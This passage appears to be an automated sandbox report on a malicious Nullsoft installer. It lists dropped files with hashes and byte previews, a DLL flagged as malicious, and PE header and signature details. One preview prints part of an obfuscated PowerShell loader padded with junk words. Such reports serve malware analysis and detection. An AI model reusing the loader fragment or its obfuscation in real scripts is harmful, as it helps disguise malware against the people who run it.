                                    MD5:7CA2DD0BDBF021D85BB1BBCA305F4E4A
                                    SHA1:D454677A43D30A5107B0E50F16AECC25D4FDFA8B
                                    SHA-256:28D8BE59CFAB5805F4AB48AAA72B54079A69C2F48136108849E8F12C9C14F92C
                                    SHA-512:DA65ECA8E6865F609B0C7ECF136BDAC7231608D936F812C6C304CE3BB58C9C6F5E4CB9315A75B551B52F726B8A1B5E3FD7EF513A4A72F028B5E49E9D1D578641
                                    Malicious:false
                                    Preview:....4.....C...i....G................F..............tW...]..4......@......0UkEr.....f...Z.....C..........................^......~.........G ......................]...9..l.............X9.....y......................U.............m.@..........F.......P(...................!..z.._.........K..c........u.............4.y..o.j.......Z...LO.I.a.:...~...... ...........R.....w..@..................J...{....v.B.......J..A...t6W....q......\......P..+2.....N..W..I...bO...............\.C....F.....7.r...]...00V.O.....kY....;$..=.m...M....................=.6.......A.........}..................O.v..].h.................D3......o.........n.....c..9... ..,...~..................b...M.#./-.h(..........B.j....8T.......s....9.p...........,6.........L$.:...F.@...........D.^......R.........X..#..c............y.....................V..=.....;w.........]B....................hV..................h........B..........f............8..9..:.C..>.j..*p}.......(..w.....l..................4......".r................

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):69848
                                    Entropy (8bit):5.231907129230566
                                    Encrypted:false
                                    SSDEEP:1536:pKKk99E8fYyNfISb0QkDkWNSJPaHsP3aKAh1tx5H4vp80NaGf:pK1c8fYyNfgHYWgk8KKAHtxVsR
                                    MD5:E857291CF7CDCFD0413D85ABDB01F724
                                    SHA1:F4C0728BA5A0E78BC19489425DFB634327CD664D
                                    SHA-256:4DF3727A11C8E633D68D7DFB08F7A679AEA4B0CFCBDA2D54DA547499A9C66E16
                                    SHA-512:1007E794C375819BF7E1011BC27077422FC40B3B8648F2AAE98CDCEBA26E0C0944CC82BD6FE93B55B65A87C828B866AAF1260E588BB94D3088635E035BA71F30
                                    Malicious:false
                                    Preview:$Haarby=$Hvsningernes;<#Ejendomsrettighed Virological Fianced Wolfwards #><#Neuterly Behovsanalyse Waterquake Sturtan daughtership Protophyll drager #><#Novemfid Tekstndringen aktiedelingers Subdiversify Databidder Pseudoscorpiones Resp #><#Forkbeard Tuvaluanerens Kampdrifterne #><#Arcosoliulia Accumulative Mangelv #><#Grdhoveds Hellfires Artikulationernes Jae Cestoids parketgulves Forsigtighedsprincippet #>$Affaldsposerne = " Jenmak;Butterf`$ thaliaSDouse tuStrghanr Frem,erbeg,lnne Tvangsb Vognmau SenegatAfspadst,kalrtza Undernl AnnikulShanesrkGenistro Divideh Aa enmo onsysulAelodiclKongruesMaxintskUnprivia sydkord Lo pebepata.dstDiabeti= Vekse,`$ N.ttedSPassiveeSlingrecFjorlamuIndigitlredressaUnp evirRve.agtiUtaknemsO dskabaDyr,idstKamgarniBetvin oAlantranDuogr,v;ArchaeoFlab,lizuRemissfnTo.terecUdplyndtNoshingiUdome.roNonrelin,omanis Dehydret Skovpao ,seudowWonderdeGenop,rrStriddlh .ndlesiInpensilEnclo.slForbrugs Shorts Forbind(Transfo`$YuppiedSRootrivtSpasmsuoTvivlsou Prepernvinterg

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\extravagence.txt

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):429
                                    Entropy (8bit):4.305854628694936
                                    Encrypted:false
                                    SSDEEP:12:X7K4oHd8PiyEL3K6SP0rr2K34hmcaQeEi8fM4oGBGXHT+MIh:XOdHbyELoPflaQOIfGXHTzIh
                                    MD5:270491E6B4F6BAB6D9A2034416B1B695
                                    SHA1:098F4A1248E4AF2290F44C89D4288FBF742E00BC
                                    SHA-256:E20EB817C5E5DC93935980C16561D27728EFE357628D43A684793DB9F3130AD7
                                    SHA-512:CFC48A418C30FD8271979E3D3766D8071963FC60D36504DEBD3CC0EA8D35136AD86FF6B278D3E3B0BCF2B6A953EEA94DA802AA4014E9E3C8CB471B08FDF20862
                                    Malicious:false
                                    Preview:billyhood eivins opsigelsestidspunkters slyngrosers nonbreaching guarana..aerobranchiate boremestrene layouten.kubong udsvejfning hyklere pudsens.renummereringsfunktionens minniebush glycolyl nereidous cav clamshells veltilfredses vaerket produktforretningens..canser opel konfidensintervals afrejst niddingerne slumberproof kilobars brontosaurus gransknings..interactive kontortids archives gumboots unimpostrous costoabdominal.

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\intertieing.hyd

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3076
                                    Entropy (8bit):4.822151505827394
                                    Encrypted:false
                                    SSDEEP:96:wON5j7GREzTpUgM/ZKOWP9/k8qAOh3R7I4ARa3P:LGREzTpOkqAqsa3P
                                    MD5:F8426FDB8764486488BCF8B38DD484A4
                                    SHA1:541158FC40283C0219922CDD651B6E57D9EAAF4F
                                    SHA-256:AB87D4BFFBDE0F6952906169AD7A87BEAB87EFAD84C3460920A243BEA659D754
                                    SHA-512:ACC54CAE6D7668A05ABD9C2A293E5CA8E72B1CF177AB0DEC6ADCB2130D252E738608DD8F3B13CAB1B76FB78AFE0E2395182F6A9EA499AC436755C45404ECD9DE
                                    Malicious:false
                                    Preview:.F6..R.....!.....C....&E..k..z.T.\...O'..........G9^.\..8.......A.......I....n..Q.b.J.....W..5J../..........A..................W..".(....[~..D.............f.....I..{~4.....t.3....i.~......->...3.b.......>...............:*..1.?...\.|{.........e..x..p...........5..............Q@....................;r..z8.K......................L...........g.....................-.2}...:...............L.......................................b.........{......Z.......:..a.....C...R.!.`.......Z.*.....z......6....H.........va].+jq...&W............. ...............F1......Q..w.W..........4..............=......W........Zk.t..<~......D.....O....'....&.Y....%j.....0............N...l..6........6............................m...!h.....(..:....F.......w../...L.............8.....QV....................:..B..(......W......3............0.........?..CG........L.n....S..d.^.....#........b.........$H........B...Q...%.la.2n`.....=.....K,.......9&...69..Y...KV............t...............d.........b.....s......5..U

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\kannevassers.esk

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3551
                                    Entropy (8bit):4.862590046832443
                                    Encrypted:false
                                    SSDEEP:96:88xtOpIIa/raEG78gsYv2XNK1Fpq+0bkpzW6/PNx1g:884I5/mEGAgLvWNK1XdzWklg
                                    MD5:1F22EB9DB671B05ED5C08F8DD00D5C48
                                    SHA1:8A7959384C2442945087D67CFE129752D2DA87FA
                                    SHA-256:191412AF797D357AE97C55047CB5A7427BED940E025D39ABC89E862177A5DAF6
                                    SHA-512:8EBF76314ACBDDECFD19849ACE9F4EAA9E2B1D4E5E7C370479707B96D139EC2800F719420EB14342394F6679C732BB1C4BC741C2F7D45DA772FD75C5A21CE5FE
                                    Malicious:false
                                    Preview:..................JZ.{...w;...........0.h............y........:u.....r.......D..4......1.....5.{...r....n.........}....3.1........Z~1......]O.....EA.........Q..............c./.................{......*O......K.....R....f.....~..................d.....6....P....................?.4.....O......'....4...dB....0............Z.0........................N......L..l.#....x...a.h.......sO..X....j...=R...k.....J.A..D...4.....f.....w....P.....8..B.]*z..........................|L......0...................vL............_.'._.....................\.M..........tO=.A.... ..-..&....&...B...........;......P...[...T....C...+r..-...F.....R.?......e.w.......y..q..............i#..:^...4.....$j.....{.P.....r......v.v8n....1..L........5Q..`.....qK...?....h.......s.......u...>....s.....k........8.1j........!>............./........fP......f...../"Q....M...?......F........1........{.ll..................B~....R...........Ux...b..n`...j.(.Y.N.g$Ow.....I....9_y.{..B4.t..~..)......JE..................E....5wh

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\overvurderingens.syn

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2928
                                    Entropy (8bit):4.804862127878948
                                    Encrypted:false
                                    SSDEEP:48:1t65YBNor6XPCY68XvqwXPZRVgb6DbKUtVEgTNMN78o26Z+V39Jwnqmv9V7J:1RNJXPC/8Xvqwp9bNq12Q+V39AqY9V7J
                                    MD5:612F90BBC9347DDEFFB620E1DD4E730B
                                    SHA1:91CD3FB4025685AC7098CD4BD3F822317B192583
                                    SHA-256:A5AED468547F93B42C66FC193F770D6E41B5F4701C0E6FC0BBA48C1589276933
                                    SHA-512:9A0DBEF78C25891D747CC211E53CAEBC60159FC6630B5A1EFBF7436A494E7F9A33E3BB313E25A44C3778DF440D5C94377BC4416F2C21934B83A9A07D35246ACE
                                    Malicious:false
                                    Preview:.......I...............y..v..t..h......`...........q......]".}...K...........N.......M.a......D..2.._.1^x.v>...........O.....j....Z.`....c..............^....5.........w........C........1...a.........m..........H..q..........L{.....S...vI..c..;...;...6.......<..KA...............a.....r.J..g.......z.zN.........~.......>......2.p.......Nr..o.......6a..N.............)...*..)5...f..}.Q.k>hB.].=*............u...Q.......:...2..........|u.a...@...........].J.........^.1..'...;..Y.......2.........y..f...............&...z...o......\..K..t..m.......d...g......~d....O.>..?0......r..(.H..........G...............q.....G.b...? ...........j.....$.,e......V...........+j..........]`S...S.a......>.........I....W..?...Tm...<..k....................!...x...M..6...S..=...........'t......=......2.......).....$..4.&..L...p.....................8....U?.h.o.......W.......................Y............w..g.....[....Q.......y.....l.a....{......5P.......N........N..]...[E.....~..........<......(...............

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\scattier.con

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3768
                                    Entropy (8bit):5.024527606885987
                                    Encrypted:false
                                    SSDEEP:96:XyaOKaw+PWpHXjGU5Nvyzt8B6XNPpaU/Ob/APQiQL:yw+PWHXSUoguamQR
                                    MD5:31030FC12E7662A05E09F8713E5188E4
                                    SHA1:8BB2E7F32CADE158C981EC302C80B31C3DC56327
                                    SHA-256:CE956FF5404172303308409C64FD6E20DD602CC4D2DDAB1EF183F0B9E4DEACC7
                                    SHA-512:BC95831C3CEBD16786CB74ECC121D7048E48BFDEE8E0EFEBBAE3406E19AFBF54121EB6AC83134B7D70FEADFE34CF4D9852EA4C26735C28762BBB5051A757CF03
                                    Malicious:false
                                    Preview:.[F......d...E...<..I.h........W....@....w..t.....(.................!...........=....|-......o...................|..m........f.J.8....E8.....yX.y.....S.....[.......3..H..?......'......(.>.....1....../....:...".....%....T...O......).....Sj....N.....m....).K\.......................1...U.....h..V..Y.A..<..........*.?.....j.....c.............~.......G.......G.......sj......"..........."...C.....m.Tr..l<.......J...<...........O...........G...................4..M./.N.a.......qe.....2....a........i...........R...gn.....n..'.w.................[..._..$..A...C.........>..9.......U....O.......3.....N..........O..........'....\.Q..+...._.....o..c.+.Ei.2...................k.U..B.......................|......w....A.e................OU..& _...4..........O.....L.....)...}.........f.............U.....<.F........S...k..3........ .....9............aE.[....2......]P*.......................u...................Z6,...@.=$...e.!.................X..U..@$...........L...3................_..`..q......,

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tfp0sw2.ta0.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tly3pdan.ial.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):7680
                                    Entropy (8bit):5.183569676039618
                                    Encrypted:false
                                    SSDEEP:96:8eE0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqkwnLiEQjJ3KxkP:tWBfjbUA/85q3wEh8uLmjLpmP
                                    MD5:350A507070ED063AC6A511AEEF67861A
                                    SHA1:CF647B90A1212E090F1D236D1B50A5010CBF3BAE
                                    SHA-256:5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
                                    SHA-512:CDE5747CC8539625E4262AFAD9699CE4E8325133D7ED7F47B9D46989A7AA0D2CC2488441ACC57368F485EF1DD3E02B9EF2FAA642F68E9F1DB53A39E0F896D468
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse
                                    • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                    • Filename: uQP25xP5DH.exe, Detection: malicious, Browse
                                    • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                    • Filename: uQP25xP5DH.exe, Detection: malicious, Browse
                                    • Filename: R7MPO3ijgz.exe, Detection: malicious, Browse
                                    • Filename: tNET06vnWS.exe, Detection: malicious, Browse
                                    • Filename: R7MPO3ijgz.exe, Detection: malicious, Browse
                                    • Filename: 0bRKaeNvVp.exe, Detection: malicious, Browse
                                    • Filename: tNET06vnWS.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L...oc.W...........!......................... ...............................P.......................................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):9728
                                    Entropy (8bit):5.067450252961874
                                    Encrypted:false
                                    SSDEEP:96:oyqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4yqndYHnxss:oyq+CP3uKrpyREs06YxKdGn
                                    MD5:13B6A88CF284D0F45619E76191E2B995
                                    SHA1:09EBB0EB4B1DCA73D354368414906FC5AD667E06
                                    SHA-256:CB958E21C3935EF7697A2F14D64CAE0F9264C91A92D2DEEB821BA58852DAC911
                                    SHA-512:2AEEAE709D759E34592D8A06C90E58AA747E14D54BE95FB133994FDCEBB1BDC8BC5D82782D0C8C3CDFD35C7BEA5D7105379D3C3A25377A8C958C7B2555B1209E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L...qc.W...........!......... ...............0.......................................................................6..k....0.......`.......................p.......................................................0...............................text...Q........................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..l....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):6656
                                    Entropy (8bit):4.994861218233575
                                    Encrypted:false
                                    SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                    MD5:B648C78981C02C434D6A04D4422A6198
                                    SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                    SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                    SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Desktop\Flyverdragter.lnk

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                    Category:dropped
                                    Size (bytes):1426
                                    Entropy (8bit):3.1292151835408184
                                    Encrypted:false
                                    SSDEEP:24:8KrxWLgD4/BV02DeVSjqVU9y+pddu5wA2M2Fdqy:868gDszheMq6xpPu5v2MCUy
                                    MD5:01ADDCEE183BD2F0071BB09D6F4FACE2
                                    SHA1:2128A70A819CE630D219136BA741098032C6AE82
                                    SHA-256:C968F34B449D3B2E778E22D4D5CEA98DE9684574D3012F3B3DEDAB8C7113D57A
                                    SHA-512:9C1BB3055AF107C4757980B84EBF59E0022F74B352BB8A7409DC52E4F1FB2880FB278F9DC0674932AB98C09F6B6BA4C6756BD69F3A87A5E7346EA6923273F5B8
                                    Malicious:false
                                    Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .`.1...........triorchism..F............................................t.r.i.o.r.c.h.i.s.m.....`.2...........hvidte.pal..F............................................h.v.i.d.t.e...p.a.l.......L.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.4175582534470115
                                    Encrypted:false
                                    SSDEEP:6144:ncifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:ci58oSWIZBk2MM6AFB4o
                                    MD5:BC2D0FEB50A1962A28590A07F76088C9
                                    SHA1:665D4557AB2E68315FF0FF6B4C2F9D2226D0D247
                                    SHA-256:9B774FB57AF816260BBAE71D49DB5933144FCBC3CA51C152EDDE83D67F674A6D
                                    SHA-512:0C7C6B5B87C414F74357299202E94F8BF20CC1E468753E2364878A472D48CC9F7680C38207A6C93F56E8751EAA004504B6560CB6A471DC035E5BFFF059F01E4F
                                    Malicious:false
                                    Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..n.M...............................................................................................................................................................................................................................................................................................................................................).x.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.664240005553691
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:anziOUzZJs.exe
                                    File size:469'904 bytes
                                    MD5:61bdbe7854f1572202f7916cf7f03616
                                    SHA1:e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
                                    SHA256:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
                                    SHA512:b9b41ede8456e65669ddf068bd6d277d60a7f2d233fa947636f998e9f77bc9be72a4b27884c9cc1bb979bbc0a8488ba8efa32375258492eb712ed864eca3a9c6
                                    SSDEEP:12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD
                                    TLSH:24A4025627D640D6F87946F1442356269363B92F18A18A8FFE5CB6FB2C74303C41FA2B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

                                    File Icon

                                    Icon Hash:3f775d2d1c1e5963

                                    Static PE Info

                                    General

                                    Entrypoint:0x4030d9
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:E=Baggrund@Dawned.Fou, O=Overophedendes, OU="Glippende Unadaptedness ", CN=Overophedendes, L=Saint-\xc9tienne, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 18/12/2023 09:04:43 17/12/2026 09:04:43
                                    Subject Chain
                                    • E=Baggrund@Dawned.Fou, O=Overophedendes, OU="Glippende Unadaptedness ", CN=Overophedendes, L=Saint-\xc9tienne, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                    Version:3
                                    Thumbprint MD5:FE17DFB774F3828E88DF777AF008BC42
                                    Thumbprint SHA-1:306D70325EC8E37C40DE5971AD7CAE1BDC91984C
                                    Thumbprint SHA-256:9C43B3018A2CB0A9FCDC9B9851216D5E764E08B107F4C225C14E7875639B2F50
                                    Serial:1BF58D5C0752B2550C09722CFFD93C395B90EDE2

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000184h
                                    push ebx
                                    push esi
                                    push edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409198h
                                    mov dword ptr [esp+20h], ebx
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [004070A8h]
                                    call dword ptr [004070A4h]
                                    cmp ax, 00000006h
                                    je 00007F18188C69F3h
                                    push ebx
                                    call 00007F18188C9961h
                                    cmp eax, ebx
                                    je 00007F18188C69E9h
                                    push 00000C00h
                                    call eax
                                    mov esi, 00407298h
                                    push esi
                                    call 00007F18188C98DDh
                                    push esi
                                    call dword ptr [004070A0h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], bl
                                    jne 00007F18188C69CDh
                                    push ebp
                                    push 00000009h
                                    call 00007F18188C9934h
                                    push 00000007h
                                    call 00007F18188C992Dh
                                    mov dword ptr [00423704h], eax
                                    call dword ptr [00407044h]
                                    push ebx
                                    call dword ptr [00407288h]
                                    mov dword ptr [004237B8h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+38h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 0041ECC8h
                                    call dword ptr [00407174h]
                                    push 00409188h
                                    push 00422F00h
                                    call 00007F18188C9557h
                                    call dword ptr [0040709Ch]
                                    mov ebp, 00429000h
                                    push eax
                                    push ebp
                                    call 00007F18188C9545h
                                    push ebx
                                    call dword ptr [00407154h]

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x15800.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x712e80x18a8
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x5c5b0x5e00905b5e59c06f35acf133c0788daacce5False0.6603640292553191data6.411456379497882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x90000x1a7f80x40000798d060e552892531c88ed1710ae2cFalse0.6376953125data5.108396988130901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x240000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x340000x158000x15800fd0be0fc5cfb383174172a3f4e7ed15dFalse0.36346293604651164data5.001547188153925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x342c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.32665917425766
